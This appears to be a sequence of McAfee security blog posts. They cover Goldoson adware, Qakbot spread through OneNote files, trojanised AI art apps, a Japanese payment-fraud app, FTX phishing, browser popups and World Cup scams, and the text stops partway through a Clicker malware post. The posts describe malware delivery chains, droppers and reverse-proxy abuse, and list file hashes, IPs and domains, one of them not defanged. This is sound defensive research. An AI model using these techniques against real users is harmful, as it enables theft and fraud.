McAfee Mobile Security detects this threat as Android/Goldoson and protects customers from this and many other mobile threats. McAfee is a member of the App Defense Alliance focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem. We reported the discovered apps to Google, which took prompt action. Google has reportedly notified the developers that their apps are in violation of Google Play policies and fixes are needed to reach compliance. Some apps were removed from Google Play while others were updated by the official developers. Users are encouraged to update the apps to the latest version to remove the identified threat from their devices.
Top 9 applications previously infected by Goldoson on Google Play
The Goldoson library registers the device and gets remote configurations at the same time the app runs. The library name and the remote server domain varies with each application, and it is obfuscated. The name Goldoson is after the first found domain name.
Remote configuration contains the parameters for each of functionalities and it specifies how often it runs the components. Based on the parameters, the library periodically checks, pulls device information, and sends them to the remote servers. The tags such as ‘ads_enable’ or ‘collect_enable’ indicates each functionality to work or not while other parameters define conditions and availability.
A response of remote configuration
The library includes the ability to load web pages without user awareness. The functionality may be abused to load ads for financial profit. Technically, the library loads HTML code and injects it into a customized and hidden WebView and it produces hidden traffic by visiting the URLs recursively.
Collected data is sent out periodically every two days but the cycle is subject to change by the remote configuration. The information contains some sensitive data including the list of installed applications, location history, MAC address of Bluetooth and Wi-Fi nearby, and more. This may allow individuals to be identified when the data is combined. The following tables show the data observed on our test device.
Google Play considers the list of installed apps to be personal and sensitive user data and requires a special permission declaration to get it. Users with Android 11 and above are more protected against apps attempting to gather all installed apps. However, even with the recent version of Android, we found that around 10% of the apps with Goldoson have the permission “QUERY_ALL_PACKAGES” that allows them to access app information.
Likewise, with Android 6.0 or higher, users may be asked for permissions such as Location, Storage, or Camera at runtime. If user allows the location permission, the app can access not only GPS data but also Wi-Fi and Bluetooth device information nearby. Based on BSSID (Basic Service Set Identifier) and RSSI (Received Signal Strength Indicator), the application can determine the location of the device more accurately than GPS, especially indoors.
A demo of runtime permission request
The infected applications come from various Android application stores. More than 100 million downloads have been tracked through Google Play. After that, ONE store, Korea’s leading app store, follows with about 8 million installations.
As applications continue to scale in size and leverage additional external libraries, it is important to understand their behavior. App developers should be upfront about libraries used and take precautions to protect users’ information. McAfee Mobile Security products can also help detect threats and protect you from not only malware but also unwanted programs. For more information, visit our McAfee Mobile Security.
Package Name | Application Name | GooglePlay Downloads |
GP Status |
com.lottemembers.android | L.POINT with L.PAY | 10M+ | Updated* |
com.Monthly23.SwipeBrickBreaker | Swipe Brick Breaker | 10M+ | Removed** |
com.realbyteapps.moneymanagerfree | Money Manager Expense & Budget | 10M+ | Updated* |
com.skt.tmap.ku | TMAP – 대리,주차,전기차 충전,킥보 … | 10M+ | Updated* |
kr.co.lottecinema.lcm | 롯데시네마 | 10M+ | Updated* |
com.ktmusic.geniemusic | 지니뮤직 – genie | 10M+ | Updated* |
com.cultureland.ver2 | 컬쳐랜드[컬쳐캐쉬] | 5M+ | Updated* |
com.gretech.gomplayerko | GOM Player | 5M+ | Updated* |
com.megabox.mop | 메가박스(Megabox) | 5M+ | Removed** |
kr.co.psynet | LIVE Score, Real-Time Score | 5M+ | Updated* |
sixclk.newpiki | Pikicast | 5M+ | Removed** |
com.appsnine.compass | Compass 9: Smart Compass | 1M+ | Removed** |
com.gomtv.gomaudio | GOM Audio – Music, Sync lyrics | 1M+ | Updated* |
com.gretech.gomtv | 곰TV – All About Video | 1M+ | Updated* |
com.guninnuri.guninday | 전역일 계산기 디데이 곰신톡–군인 … | 1M+ | Updated* |
com.itemmania.imiapp | 아이템매니아 – 게임 아이템 거래 … | 1M+ | Removed** |
com.lotteworld.android.lottemagicpass | LOTTE WORLD Magicpass | 1M+ | Updated* |
com.Monthly23.BounceBrickBreaker | Bounce Brick Breaker | 1M+ | Removed** |
com.Monthly23.InfiniteSlice | Infinite Slice | 1M+ | Removed** |
com.pump.noraebang | 나홀로 노래방–쉽게 찾아 이용하는 … | 1M+ | Updated* |
com.somcloud.somnote | SomNote – Beautiful note app | 1M+ | Removed** |
com.whitecrow.metroid | Korea Subway Info : Metroid | 1M+ | Updated* |
kr.co.GoodTVBible | GOODTV다번역성경찬송 | 1M+ | Removed** |
kr.co.happymobile.happyscreen | 해피스크린 – 해피포인트를 모으 … | 1M+ | Updated* |
kr.co.rinasoft.howuse | UBhind: Mobile Tracker Manager | 1M+ | Removed** |
mafu.driving.free | 스피드 운전면허 필기시험 … | 1M+ | Removed** |
com.wtwoo.girlsinger.worldcup | 이상형 월드컵 | 500K+ | Updated* |
kr.ac.fspmobile.cu | CU편의점택배 | 500K+ | Removed** |
com.appsnine.audiorecorder | 스마트 녹음기 : 음성 녹음기 | 100K+ | Removed** |
com.camera.catmera | 캣메라 [순정 무음카메라] | 100K+ | Removed** |
com.cultureland.plus | 컬쳐플러스:컬쳐랜드 혜택 더하기 … | 100K+ | Updated* |
com.dkworks.simple_air | 창문닫아요(미세/초미세먼지/WHO … | 100K+ | Removed** |
com.lotteworld.ticket.seoulsky | 롯데월드타워 서울스카이 | 100K+ | Updated* |
com.Monthly23.LevelUpSnakeBall | Snake Ball Lover | 100K+ | Removed** |
com.nmp.playgeto | 게토(geto) – PC방 게이머 필수 앱 | 100K+ | Removed** |
com.note.app.memorymemo | 기억메모 – 심플해서 더 좋은 메모장 | 100K+ | Removed** |
com.player.pb.stream | 풀빵 : 광고 없는 유튜브 영상 … | 100K+ | Removed** |
com.realbyteapps.moneya | Money Manager (Remove Ads) | 100K+ | Updated* |
com.wishpoke.fanciticon | Inssaticon – Cute Emoticons, K | 100K+ | Removed** |
marifish.elder815.ecloud | 클라우드런처 | 100K+ | Updated* |
com.dtryx.scinema | 작은영화관 | 50K+ | Updated* |
com.kcld.ticketoffice | 매표소–뮤지컬문화공연 예매& … | 50K+ | Updated* |
com.lotteworld.ticket.aquarium | 롯데월드 아쿠아리움 | 50K+ | Updated* |
com.lotteworld.ticket.waterpark | 롯데 워터파크 | 50K+ | Updated* |
com.skt.skaf.l001mtm091 | T map for KT, LGU+ | 50K+ | Removed** |
org.howcompany.randomnumber | 숫자 뽑기 | 50K+ | Updated* |
com.aog.loader | 로더(Loader) – 효과음 다운로드 앱 | 10K+ | Removed** |
com.gomtv.gomaudio.pro | GOM Audio Plus – Music, Sync l | 10K+ | Updated* |
com.NineGames.SwipeBrickBreaker2 | Swipe Brick Breaker 2 | 10K+ | Removed** |
com.notice.safehome | 안심해 – 안심귀가 프로젝트 | 10K+ | Removed** |
kr.thepay.chuncheon | 불러봄내 – 춘천시민을 위한 공공 … | 10K+ | Removed** |
com.curation.fantaholic | 판타홀릭 – 아이돌 SNS 앱 | 5K+ | Removed** |
com.dtryx.cinecube | 씨네큐브 | 5K+ | Updated* |
com.p2e.tia.tnt | TNT | 5K+ | Removed** |
com.health.bestcare | 베스트케어–위험한 전자기장, … | 1K+ | Removed** |
com.ninegames.solitaire | InfinitySolitaire | 1K+ | Removed** |
com.notice.newsafe | 안심해 : 안심지도 | 1K+ | Removed** |
com.notii.cashnote | 노티아이 for 소상공인 | 1K+ | Removed** |
com.tdi.dataone | TDI News – 최초 데이터 뉴스 앱 … | 1K+ | Removed** |
com.ting.eyesting | 눈팅 – 여자들의 커뮤니티 | 500+ | Removed** |
com.ting.tingsearch | 팅서치 TingSearch | 50+ | Removed** |
com.celeb.tube.krieshachu | 츄스틱 : 크리샤츄 Fantastic | 50+ | Removed** |
com.player.yeonhagoogokka | 연하구곡 | 10+ | Removed** |
* Updated means that the recent application on Google Play does not contain the malicious library.
** Removed means the application is not available on Google Play as of the time of posting.
The post Goldoson: Privacy-invasive and Clicker Android Adware found in popular apps in South Korea appeared first on McAfee Blog.
Authored By Anandeshwar Unnikrishnan,Sakshi Jaiswal,Anuradha M
McAfee Labs has recently observed a new Malware campaign which used malicious OneNote documents to entice users to click on an embedded file to download and execute the Qakbot trojan.
OneNote is a Microsoft digital notebook application that can be downloaded for free. It is a note-taking app that allows collaboration across organizations while enabling users to embed files and other artifacts. It is installed by default in Microsoft Office 2021 and Microsoft 365.
Malicious Actors are always trying to find new ways in to infect their victims. Such as their shift to LNK files after Microsoft introduced a policy change disabled office macros by default. Due to a feature that allows users to attach files to OneNote documents it makes them a good alternative to LNK files as distribution vehicle to deploy their malware. This blog contains analysis on how OneNote documents are used malicious and two specific campaigns that made use of OneNote documents to download and execute the Qakbot malware.
Figure 1 shows the geo wise distribution of McAfee customers detecting malicious OneNote files.
Based on the telemetry from our endpoints we have identified the following threat families deployed through OneNote documents:
A holistic view of the phishing campaigns that weaponize OneNote document is shown in Figure 2 below. The malicious document is delivered in either zip files or ISO images to the target through phishing emails. We have observed that most of the malicious documents either have Windows batch script that invokes Powershell for dropping the malware on the system or Visual Basic scripts that does the same.
The generic theme of the email is invoice or legal related. These types of themes are more likely to be opened by the vicim. An example email body and attachment is shown in Figure 3 and 4.
To understand how the data is laid out in the file, we need to examine it at byte level. Taking a close look at OneNote document gives us an interesting observation as its magic bytes for the header is not a trivial one. Figure 5 shows the first 16 bytes of the document binary.
The first 16 bytes need to be interpreted as GUID value {7B5C52E4-D88C-4DA7-AEB1-5378D02996D3}. We can use the official documentation for OneNote specification to make sense of all the bytes and its structuring. Figure 6 shows header information taken from the OneNote specification document.
The Data Stream in OneNote, Say Hello To FileDataStoreObject
To find the embedded data in a OneNote document, we need to learn more about the FileDataStoreObject which has a GUID value of {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}. The structure that holds the data is shown below:
The FileData member of the FileDataStoreObject is the key member that holds the embedded data in the OneNote document. The size can be retrieved from the cbLength member.
Figure 7 shows the “on disk” representation of the FileDataStoreObject This is taken from a malicious OneNote document used to spread the Qakbot payload. The guidHeader for the data object is highlighted in yellow and the data is shown in red. As it is evident from the image the data represents a text file which is a script to launch PowerShell.
For more information on the OneNote specification, go to reference section
Now we have an idea of what the data object is, with this knowledge we can automate the process of extracting embedded artifacts for further analysis from the OneNote document by following the below algorithm.
Looking at the runtime characteristics of OneNote Desktop application we have observed that when an embedded file gets executed by the user, it is stored temporarily in the OneNote directory in the User’s Temp location. Each directory with GUID values represents a different document opened in the OneNote application.
By analyzing numerous malicious documents, we have been able to create a “test” OneNote document that executes a batch file that contains the “whoami” command. The image in Figure 9 show the batch file being created in the user’s temp location.
This section contains specific details on a Qakbot campaign. In campaign 1, the malware author used phishing emails to deliver malicious OneNote document either as attachment or a URL link to zip file containing the OneNote document. The OneNote contained aHTA file that once executed would make use of the curl utility to download Qakbot and then execute it.
The OneNote file with the embedded HTA file is shown in the Figure 11. Once this OneNote file is opened, it prompts the user with a fake message to double-click on open to view the attachment.
Upon clicking the Open button, it drops the HTA file with the name Open.hta to the %temp% Folder and executes it using mshta.exe.
The HTA file contains obfuscated script as shown below:
The HTA file is loaded by MSHTA and creates a registry key in HKEY_CURRENT_USER\SOFTWARE\ with obfuscated content as shown below:
De-obfuscated content from the HTA file is shown below:
Figure 18 shows the process tree of Qakbot:
Type | Value | Product | Detected |
Campain 1 – OneNote File | 88c24db6c7513f47496d2e4b81331af60a70cf8fb491540424d2a0be0b62f5ea | Total Protection and LiveSafe | VBS/Qakbot.a |
Campain 1 – HTA File | e85f2b92c0c2de054af2147505320e0ce955f08a2ff411a34dce69c28b11b4e4 | Total Protection and LiveSafe | VBS/Qakbot.b |
Campain 1 – DLL File | 15789B9b6f09ab7a498eebbe7c63b21a6a64356c20b7921e11e01cd7b1b495e3 | Total Protection and LiveSafe | Qakbot-FMZ |
The OneNote document for campaign 2 is shown in Figure 19. At first glance it it appears that there is a ‘Open’ button embedded within the document. The message above the ‘Open’ button instructs the user to “double click” in order to receive the attachment.
A closer look at the document reveals the graphical elements are all images placed in a layered style by the malicious actor. By moving the icons aside, we can see the malicious batch file which when executed downloads the payload from the Internet and executes on the target system.
Execution Of Payload Dropper
Upon execution of the batch file, Powershell will be invoked and it fetch the Qakbot payload from Internet and execute it on the target system. This section will cover details of dropper script used to deploy QakBot. The Figure 21 Show the process tree after the execution of the script and you can see that powershell.exe was launched by cmd.exe and the parent of cmd.exe is onenote.exe.
The contents of process cmd.exe (7176) are shown below.
The base64 decoded batch file is shown in Figure 23. This will use powershell to download the payload and then execute it with rundll32.exe
Type | Value | Product | Detected |
Campain 2 – Zip File |
000fb3799a741d80156c512c792ce09b9c4fbd8db108d63f3fdb0194c122e2a1
|
Total Protection and LiveSafe | VBS/Qakbot.a |
Campain 2 – OneNote File | 2bbfc13c80c7c6e77478ec38d499447288adc78a2e4b3f8da6223db9e3ac2d75 | Total Protection and LiveSafe | One/Downloader.a |
Campain 2 – Powershell File | b4dd3e93356329c076c0d2cd5ac30a806daf46006bdb81199355952e9d949424 | Total Protection and LiveSafe | PS/Agent.gs |
Campain 2 – OneNoteFile | a870d31caea7f6925f41b581b98c35b162738034d5d86c0c27c5a8d78404e860 | Total Protection and LiveSafe | VBS/Qakbot.a |
starcomputadoras.com
Malware authors are getting more sophisticated when it comes to hiding their payloads. This Blog highlights the recent Qakbot campaign that delivers its payload which uses the OneNote application as a delivery mechanism. McAfee Customers should keep their systems up-to-date and refrain from clicking links and opening attachments in suspicious emails to stay protected.
The post The Rising Trend of OneNote Documents for Malware delivery appeared first on McAfee Blog.
Authored by Fernando Ruiz
The popularity of AI-based mobile applications that can create artistic images based on pictures, such as the “Magic Avatars” from Lensa, and the OpenAI service DALL-E 2 that generates them from text, have increased the mainstream interest of these tools. Users should be aware of those seeking to take advantage to distribute Potential Unwanted Programs (PUPs) or malware, such as through deceptive applications that promise the same or similar advanced features but are just basic image editors or otherwise repackaged apps that can drain your data plan and battery life with Clicker and HiddenAds behaviors, subscribe you to expensive services that provide little or no value over alternatives (Fleeceware), or even steal your social media account credentials (FaceStealer).
Dozens of apps surface daily claiming to offer AI image creation. Some of them might be legitimate or based on open-source projects such as Stable Diffusion, but in the search for a free application that produces quality results, users might try new apps that could compromise their privacy, user experience, wallet and/or security.
The McAfee Mobile Research Team recently discovered a series of repackaged image editors on the Google Play app store which presented concerning behaviors. McAfee Mobile Security products help protect against such apps, including those classified as Android/FakeApp, Android/FaceStealer, Android/PUP.Repacked and Android/PUP.GenericAdware.
McAfee, a member of the App Defense Alliance focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem, reported the discovered apps to Google, which took prompt action and the apps are no longer available on Google Play.
We now discuss various types of privacy and/or security risks associated with the types of apps recently removed from the app store.
“Pista – Cartoon Photo Effect” and “NewProfilePicture” are examples of apps that offered compelling visual results, however, each was based on the same image editor with basic filters and trojanized with Android/FaceStealer, which is a well-known malware capable of compromising a victim’s Facebook or Instagram account. The apps could capture user credentials during a Facebook login by embedding a javascript function loaded from a remote server (to evade detection) into a flutter webview activity that displays the Facebook login screen.
“NewProfilePicture” and “Pista – Cartoon Photo Effect” are examples of FaceStealer malware that posed as a cartoon avatar creator.
The same image editor which was repackaged into the above two apps has also been repackaged alternatively with adware modules and distributed by other developers under other app names, such as “Cartoon Effect | Cartoon Photo”:
Fleeceware refers to mobile apps that use various tactics to enroll users into subscriptions with high fees, typically after a free trial period, and often with little or no value to the subscriber beyond cheaper or free alternatives. If the user does not take care to cancel their subscription, they continue to be charged even after deleting the app.
“Toonify Me”, which is no longer available on the Play Store, cost $49.99 per week after 3 days – almost $2,600 per year – for what featured AI-generated illustrations in the app description, but was another repackaged version of the same image editor functionality found within “NewProfilePicture” and “Pista – Cartoon Photo Effect”.
In this case, the “Toonify Me” app did not allow feature access without enrolling in the subscription, and the “CONTINUE” button which initiated the subscription was the only option to tap in the app once it was launched.
Promoted by ads that described it as capable of transforming pictures into artistic drawings, the “Fun Coloring – Paint by Number” app is an example of a repackaged version of a different, legitimate pixel painting app. It lacked the advertised AI effects and was plagued with adware-like behavior.
Advertisement of “Fun Coloring – Paint by Number” on social media which included app store link
Consistent with many reviews complaining about unexpected ads out of the context of the app, once installed, the app started a service that communicated in the background with Facebook Graph API every 5 seconds and might pull ads based on received commands after some time of execution. The app contained multiple injected SDK modules from AppsFlyer, Fyber, InMobi, IAB, Mintegral, PubNative and Smaato (none of which are in the original app, which was repackaged to include these), which would help monetize installations without regard for user experience.
When new types of apps become popular and new ones appear on the market to offer similar features, users should act with caution to avoid becoming victim to those wanting to exploit public interest.
When installing an app that causes you doubt, make sure you:
Even if an app is legitimate, we also encourage users to look closely before installation at any available privacy policy to understand how personal data will be treated. Your face is a biometric identifier that’s not easy to change, and multiple pictures might be needed (and stored) to create your model.
Artificial intelligence tools will continue to amaze us with their capabilities and probably will become more accessible and safer to use over time. For now, keep in mind that AI technology is still limited and experimental, and can be expensive to use – always consider any hidden costs. AI also will bring more challenges as we discussed on the 2023 McAfee Threat Prediction blog.
The following table lists the application package name, hash sum SHA256, the minimum number of installations on Google Play, and the type of detected threat. These apps were removed from Google Play, but some may remain available elsewhere.
Package Name | SHA256 | Installs | Type |
com.ayogamez.sketchcartoon | 9cb1d996643fbec26bb9878939735221dfbf639075ceea3abdb94e0982c494c1 | 5M | Adware |
com.rocketboosterapps.toonifyme | 3f45a38b103e1812146df8ce179182f54c4a0191e19560fcbd77240cbc39886b | 10K | Fleeceware |
com.nhatanhstudio.cartoon.photoeffect | 2c7f4fc403d1449b70218624d8a409497bf4694493c7f4c06cd8ccecff21799a | 5K | Repackaged Adware |
com.cambe.PhotoCartoon | 5327f415d0e9b21523f64403ec231e1fd0279c48b41f023160cd1d70dd733dbf | 10K | Repackaged Adware |
com.chiroh.cartoon.prismaeffect | 18fef9f92639e31dd6566854feb30e1e4333b971b05ae9aba93ac0aa395c955b | 1K | Repackaged Adware |
cartoon.photo.effect.editor.cartoon.maker.online. caricature.appanime.convert.photo.intocartoon |
3b941b7005572760b95239d73b8a8bbfdb81d26d405941171328daa8f3c01183 | 50 | Repackaged Adware |
com.waxwell.saunders.pistaphotoeditor | 489d4aaec3bc694ddd124ab8b4f0b7621a51aad13598fd39cd5c3d2067b950e5 | 50 | FaceStealer |
com.ashtoon.tooncool.skordoi | 980c090c01bef890ef74bd93e181d67a5c6cd1b091573eaaf2e1988756aacd50 | 100K | FaceStealer |
com.faceart.savetoon.cartoonedit | 55ffc2e392280e8967de0857b02946094268588209963c6146dad01ae537daca | 100 | FaceStealer |
com.okenyo.creatkartoon.studio | e696d7304e5f56d7125dd54c853ff35a394a4175fcaf7785d332404e161d6deb | 500K | FaceStealer |
com.onlansuyanto.editor.bading | 59f9630c2ebe4896f585ec7722c43bb54c926e3e915dcfa4ff807bea444dc07b | 10K | FaceStealer |
com.madtoon.aicartoon.kiroah | c29adfade300dde5e9c31b23d35a6792ed4a7ad8394d37b69b5cecc931a7ad9f | 100K | FaceStealer |
com.acetoon.studio.facephoto | 24cf7fcaefe98bc9db34f551d11906d3f1349a5b60adf5fa37f15a872b61ee95 | 100K | FaceStealer |
com.funcolornext.beautyfungoodcolor | b2cfa8b2eccecdcb06293512df0db463850704383f920e5782ee6c5347edc6f5 | 100K | Repackaged Adware |
The post The Rise and Risks of AI Art Apps appeared first on McAfee Blog.
Authored by SangRyol Ryu and Yukihiro Okutomi
McAfee’s Mobile Research team recently analyzed new malware targeting mobile payment users in Japan. The malware which was distributed on the Google Play store pretends to be a legitimate mobile security app, but it is in fact a payment fraud malware stealing passwords and abusing reverse proxy targeting the mobile payment services. McAfee researchers notified Google of the malicious apps, スマホ安心セキュリティ, or ‘Smartphone Anshin Security’, package name ‘com.z.cloud.px.app’ and ‘com.z.px.appx’. The applications are no longer available on Google Play. Google Play Protect has also taken steps to protect users by disabling the apps and providing a warning. McAfee Mobile Security products detect this threat as Android/ProxySpy.
The malware actor continues to publish malicious apps on the Google Play Store with various developer accounts. According to the information posted on Twitter by Yusuke Osumi, Security Researcher at Yahoo! Japan, the attacker sends SMS messages from overseas with a Google Play link to lure users to install the malware. To attract more users, the message entices users to update security software.
A SMS message from France (from Twitter post by Yusuke)
Malware on Google Play
The Mobile Research team also found that the malware actor uses Google Drive to distribute the malware. In contrast to installing an application after downloading an APK file, Google Drive allows users to install APK files without leaving any footprint and makes the installation process simpler. Once the user clicks the link, there are only a few more touches required to run the application. Only three clicks are enough if users have previously allowed the installation of unknown apps on Google Drive.
Following notification from McAfee researchers, Google has removed known Google Drive files associated with the malware hashes listed in this blog post.
When a user installs and launches this malware, it asks for the Service password. Cleverly, the malware shows incorrect password messages to collect the more precise passwords. Of course, it does not matter whether the password is correct or not. It is a way of getting the Service password. The Service password is used for the payment service which provides easy online payments. The user can start this payment service by setting a Service password. The charge will be paid along with the mobile phone bill.
There is a native library named ‘libmyapp.so’ loaded during the app execution written in Golang. The library, when loaded, tries to connect to the C2 server using a Web Socket. Web Application Messaging Protocol (WAMP) is used to communicate and process Remote Procedure Calls (RPC). When the connection is made, the malware sends out network information along with the phone number. Then, it registers the client’s procedure commands described in the table below. The web socket connection is kept alive and takes the corresponding action when the command is received from the server like an Agent. And the socket is used to send the Service password out to the attacker when the user enters the Service password on the activity.
RPC Function name | Description |
connect_to | Create reverse proxy and connect to remote server |
disconnect | Disconnect the reverse proxy |
get_status | Send the reverse proxy status |
get_info | Send line number, connection type, operator, and so on |
toggle_wifi | Set the Wi-Fi ON/OFF |
show_battery_opt | Show dialog to exclude battery optimization for background work |
Registered RPC functions description
To make a fraudulent purchase by using leaked information, the attacker needs to use the user’s network. The RPC command ‘toggle_wifi’ can switch the connection state to Wi-Fi or cellular network, and ‘connect_to’ will provide a reverse proxy to the attacker. A reverse proxy can allow connecting the host behind a NAT (Network Address Translation) or a firewall. Via the proxy, the attacker can send purchase requests via the user’s network.
It is an interesting point that the malware uses a reverse proxy to steal the user’s network and implement an Agent service with WAMP. McAfee Mobile Research Team will continue to find this kind of threat and protect our customers from mobile threats. It is recommended to be more careful when entering a password or confidential information into untrusted applications.
193[.]239[.]154[.]23
91[.]204[.]227[.]132
ruboq[.]com
SHA256 | Package Name | Distribution |
5d29dd12faaafd40300752c584ee3c072d6fc9a7a98a357a145701aaa85950dd | com.z.cloud.px.app | Google Play |
e133be729128ed6764471ee7d7c36f2ccb70edf789286cc3a834e689432fc9b0 | com.z.cloud.px.app | Other |
e7948392903e4c8762771f12e2d6693bf3e2e091a0fc88e91b177a58614fef02 | com.z.px.appx | Google Play |
3971309ce4a3cfb3cdbf8abde19d46586f6e4d5fc9f54c562428b0e0428325ad | com.z.cloud.px.app2 | Other |
2ec2fb9e20b99f60a30aaa630b393d8277949c34043ebe994dd0ffc7176904a4 | com.jg.rc.papp | Google Drive |
af0d2e5e2994a3edd87f6d0b9b9a85fb1c41d33edfd552fcc64b43c713cdd956 | com.de.rc.seee | Google Drive |
The post Fake Security App Found Abuses Japanese Payment System appeared first on McAfee Blog.
Authored by Oliver Devane
It hasn’t taken malicious actors long to take advantage of the recent bankruptcy filing of FTX, McAfee has discovered several phishing sites targeting FTX users.
One of the sites discovered was registered on the 15th of November and asks users to submit their crypto wallet phrase to receive a refund. After entering this phrase, the creators of the site would gain access to the victim’s crypto wallet and they would likely transfer all the funds out of it.
Upon analyzing the website code used to create the phishing sites, we noticed that they were extremely similar to previous sites targeting WalletConnect customers, so it appears that they likely just modified a previous phishing kit to target FTX users.
The image below shows a code comparison between a website from June 2022, and it shows that the FTX phishing site shares most of its code with it.
McAfee urges anyone who was using FTX to be weary of any unsolicited emails or social media messages they receive and to double-check the authenticity before accessing them. If you are unsure of the signs to look for, please check out the McAfee Scam education portal (https://www.mcafee.com/consumer/en-us/landing-page/retention/scammer-education.html)
McAfee customers are protected against the sites mentioned in this blog
Type | Value | Product | Detected |
URL | ftx-users-refund[.]com | McAfee WebAdvisor | Blocked |
URL | ftx-refund[.]com | McAfee WebAdvisor | Blocked |
The post Threat Actors Taking Advantage of FTX Bankruptcy appeared first on McAfee Blog.
Following up on our previous blog, How to Stop the Popups, McAfee Labs saw a sharp decrease in the number of deceptive push notifications reported by McAfee consumers running Microsoft’s Edge browser on Windows.
Such browser-delivered push messages appear as toaster pop-ups in the tray above the system clock and are meant to trick users into taking various actions, such as installing software, purchasing a subscription, or providing personal information.
Upon further investigation, this major drop seems to be associated with a change in the behavior of the Edge browser with two notable improvements over older versions.
First, when users visit websites known to deliver deceptive push notifications, Edge blocks authorization prompts that could trick users into opting-in to receive popups:
Second, when unwanted popups do occur, it is now easier than ever to disable them, on a per-site basis. Users can simply click the three dots (…) on the right of the notification and choose to “Turn off all notifications for” the domain responsible for the popup.
This is a great improvement over the previous experience of having to manually navigate browser settings to achieve the desired result.
Earlier this year, 9TO5Google reported a Chrome code change may be indicative of a similar crack down by Google on nefarious popups.
One can hope Google will follow Microsoft’s example to improve browser security and usability.
The post Microsoft’s Edge over Popups (and Google Chrome) appeared first on McAfee Blog.
Authored by: Christy Crimmins and Oliver Devane
Football (or Soccer as we call it in the U.S.) is the most popular sport in the world, with over 3.5 billion fans across the globe. On November 20th, the men’s World Cup kicks off (pun intended) in Qatar. This event, a tournament played by 32 national teams every four years, determines the sport’s world champion. It will also be one of the most-watched sporting events of at least the last four years (since the previous World Cup).
An event with this level of popularity and interest also attracts fraudsters and cyber criminals looking to capitalize on fans’ excitement. Here’s how to spot these scams and stay penalty-free during this year’s tournament.
Phishing is a tool that cybercriminals have used for years now. Most of us are familiar with the telltale signs—misspelled words, poor grammar, and a sender email whose email address makes no sense or whose phone number is unknown. But excitement and anticipation can cloud our judgment. What football fan wouldn’t be tempted to win a free trip to see their home team participate in the ultimate tournament? Cybercriminals are betting that this excitement will cloud fans’ judgment, leading them to click on nefarious links that ultimately download malware or steal personal information.
It’s important to realize that these messages can come via a variety of channels, including email, text messages, (also known as smishing) and other messaging channels like WhatsApp and Telegram. No matter what the source is, it’s essential to remain vigilant and pause to think before clicking links or giving out personal or banking information.
For more information on phishing and how to spot a phisher, see McAfee’s “What is Phishing?” blog.
According to ActionFraud, the UK’s national reporting center for fraud and cybercrime, thousands of people were victims of ticket fraud in 2019—and that’s just in the UK. Ticket fraud is when someone advertises tickets for sale, usually through a website or message board, collects the payment and then disappears, without the buyer ever receiving the ticket.
The World Cup is a prime (and lucrative) target for this type of scam, with fans willing to pay thousands of dollars to see their teams compete. Chances are most people have their tickets firmly in hand (or digital wallet) by now, but if you’re planning to try a last-minute trip, beware of this scam and make sure that you’re using a legitimate, reputable ticket broker. To be perfectly safe, stick with well-known ticket brokers and those who offer consumer protection. Also beware of sites that don’t accept debit or credit cards and only accept payment in the form of bitcoin or wire transfers such as the one on the fake ticket site below:
The red box on the right image shows that the ticket site accepts payment via Bitcoin.
Other red flags to look out for are websites that ask you to contact them to make payment and the only contact information is via WhatsApp.
Let’s be realistic—most of us are going to have to settle for watching the World Cup from the comfort of our own home, or the pub down the street. If you’re watching the tournament online, be sure that you’re using a legitimate streaming service. A quick Google of “FIFA World Cup 2022 Official Streaming” along with your country should get you the information you need to safely watch the event through official channels. The FIFA site itself is also a good source of information.
Illegal streaming sites usually contain deceptive ads and malware which can cause harm to your device.
In countries or regions where sports betting is legal, the 2022 World Cup is expected to drive an increase in activity. There’s no shortage of things to bet on, from a simple win/loss to the exact minute a goal will be scored by a particular player. Everything is subject to wager.
As with our previous examples, this increase in legitimate gambling brings with it an increase in deceptive activity. Online betting scams often start when users are directed to or search for gambling site and end up on a fraudulent one. After placing their bets and winning, users realize that while they may have “won” money, they are unable to withdraw it and are even sometimes asked to deposit even more money to make winnings available, and even then, they still won’t be. By the end of this process, the bettor has lost all their initial money (and then some, potentially) as well as any personal information they shared on the site.
Like other scams, users should be wary of sites that look hastily put together or are riddled with errors. Your best bet (yes, again, pun intended) is to look for an established online service that is approved by your government or region’s gaming commission. Finally, reading the fine print on incentives or bonuses is always a good idea. If something sounds too good to be true, it’s best to double-check.
For more on how you can bet online safely, and for details on how legalized online betting works in the U.S., check out our blog on the topic.
Using a free public Wi-Fi connection is risky. User data on these networks is unprotected, which makes it vulnerable to cyber criminals. Whether you’re traveling to Qatar for a match or watching the them with friends at your favorite pub, if you’re connecting to a public Wi-Fi connection, make sure you use a trusted VPN connection.
For more information on scams, visit our scam education page. Hopefully, with these tips, you’ll be able to enjoy and participate in some of the World Cup festivities, after all, fun is the goal!
The post Don’t Get Caught Offsides with These World Cup Scams appeared first on McAfee Blog.
Authored by SangRyol Ryu
Cybercriminals are always after illegal advertising revenue. As we have previously reported, we have seen many mobile malwares masquerading as a useful tool or utility, and automatically crawling ads in the background. Recently the McAfee Mobile Research Team has identified new Clicker malware that sneaked into Google Play. In total 16 applications that were previously on Google Play have been confirmed to have the malicious payload with an assumed 20 million installations.
McAfee security researchers notified Google and all of the identified apps are no longer available on Google Play. Users are also protected by Google Play Protect, which blocks these apps on Android. McAfee Mobile Security products detect this threat as Android/Clicker and protect you from malware. For more information, to get fully protected, visit McAfee Mobile Security.
The malicious code was found on useful utility applications like Flashlight (Torch), QR readers, Camara, Unit converters, and Task managers:
Once the application is opened, it downloads its remote configuration by executing an HTTP request. After the configuration is downloaded, it registers the FCM (Firebase Cloud Messaging) listener to receive push messages. At first glance, it seems like well-made android software. However, it is hiding ad fraud features behind, armed with remote configuration and FCM techniques.
Attribute name | Known meaning of the value |
FCMDelay | Initial start hours after first installation |
adButton | Visivility of a button of Advertisement |
adMob | AdMob unit ID |
adMobBanner | AdMob unit ID |
casOn | Whether CAS library works or not |
facebookAd | FaceBook Ad ID |
fbAdRatio | Ratio of FB AD |
googleAdRatio | Ratio of AdMob |
is | Decide BootService to run or not |
urlOpen | to open popup or not when starts PowerService |
popUrl | URL for PowerService |
popUpDelay | Delay time for PowerService |
liveUrl | URL for livecheck service |
pbeKey | Key for making unique string |
playButtonList | URL for other service |
reviewPopupDialog | ‘y’ it shows review dialog |
tickDelay | Delay time for TickService |
tickEnable | Value of TickService enabled |
tickRandomMax | Value of TickService random delay |
tickRandomMin | Value of TickService random delay |
tickType | Set the type of TickService |
updateNotiVersion | Value for showing update activity |
The FCM message has various types of information and that includes which function to call and its parameters. The picture below shows some of FCM message history:
